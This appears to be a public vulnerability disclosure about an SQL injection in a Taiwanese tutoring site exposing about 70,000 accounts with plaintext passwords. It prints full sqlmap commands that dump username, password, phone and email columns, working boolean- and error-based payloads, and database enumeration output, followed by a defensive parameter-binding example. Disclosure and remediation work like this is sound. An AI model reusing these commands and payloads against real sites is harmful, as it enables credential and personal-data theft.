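2015-11-30: Details reported to the vendor; awaiting vendor response
2015-12-02: Vendor confirmed; details disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and experts in related fields
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public
SQL injection vulnerability in 家教銀行 (Tutor Bank), a site operated by 創意王數位科技有限公司 (plaintext passwords and personal data of more than 40,000 teachers and more than 30,000 users exposed)
URL: http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2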
$ python sqlmap.py -u "http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2" -p s1 --technique=BE --random-agent --batch -D tutorbankcomtw -T teacher -C t_user,t_passwd,t_name1,t_name2,t_phone --dump --start 1 --stop 20
$ python sqlmap.py -u "http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2" -p s1 --technique=BE --random-agent --batch -D tutorbankcomtw -T member -C m_user,m_passwd,m_mobile,m_login,m_email --dump --start 1 --stop 20
Database: tutorbankcomtw
+---------+---------+
| Table   | Entries |
+---------+---------+
| teacher | 42398   |
| member  | 32900   |
+---------+---------+
---
Parameter: s1 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431=9431,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BaDQ'='BaDQ&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: 'tutorbankcomtw@%'
current user is DBA: False
database management system users [1]:
[*] 'tutorbankcomtw'@'%'

Database: tutorbankcomtw
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| teacher       | 42398   |
| member        | 32900   |
| t_logintime   | 28380   |
| member_app    | 13131   |
| m_logintime   | 12955   |
| teacher_favor | 12588   |
| teacher_app   | 9493    |
| case_favor    | 5756    |
| newcase       | 5538    |
| smilepay      | 1788    |
| iepay_1       | 862     |
| iepay_2       | 195     |
| index1ad      | 5       |
| indexad       | 5       |
| teacherad     | 4       |
| memberad      | 3       |
| casead        | 2       |
| upad          | 2       |
| index2ad      | 1       |
| index3ad      | 1       |
+---------------+---------+

columns LIKE 'pass' were found in the following databases:
Database: tutorbankcomtw
Table: member
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| m_passwd | varchar(16) |
+----------+-------------+

Database: tutorbankcomtw
Table: teacher
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| t_passwd | varchar(16) |
+----------+-------------+
Add input filtering.
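Both sqlmap payloads open with `')`, which shows the value of `s1` landing inside a quoted, parenthesised string literal; binding the value as a parameter removes that injection point at the root, with filtering as a second layer. The following is an added example, not code from the site or the report: the table, column names and query shape are assumptions, and SQLite stands in for MySQL, so the probes end in `-- ` rather than `#`.

```python
import sqlite3

# Probes modelled on the report's boolean-based payload (SQLite comment syntax).
TRUE_PROBE = "english') AND 4998=4998-- "
FALSE_PROBE = "english') AND 4998=4999-- "

def make_db():
    """Constructed sample data; the schema is hypothetical, not the site's."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tutor (id INTEGER PRIMARY KEY, lang TEXT, name TEXT)")
    db.executemany("INSERT INTO tutor (lang, name) VALUES (?, ?)",
                   [("english", "tutor-a"), ("japanese", "tutor-b"),
                    ("english", "tutor-c")])
    return db

def search_vulnerable(db, s1):
    """'Before': the request value is concatenated into the SQL text."""
    sql = "SELECT name FROM tutor WHERE (lang = '" + s1 + "') ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def search_safe(db, s1):
    """'After': the value is bound, so it can only ever be compared as data."""
    sql = "SELECT name FROM tutor WHERE (lang = ?) ORDER BY id"
    return [row[0] for row in db.execute(sql, (s1,))]

def is_valid_term(s1):
    """Allow-list 'filtering' as a second layer, not a substitute for binding."""
    return s1.isalnum() and len(s1) <= 32

def has_boolean_oracle(search, db):
    """True if a true/false condition inside s1 changes the response."""
    return search(db, TRUE_PROBE) != search(db, FALSE_PROBE)

if __name__ == "__main__":
    db = make_db()
    for fn in (search_vulnerable, search_safe):
        print(fn.__name__, "boolean oracle:", has_boolean_oracle(fn, db))
```

`has_boolean_oracle` works as a regression check: it should return False for every search handler once the fix is deployed.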
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-12-02 01:41
Thank you for the report.
None yet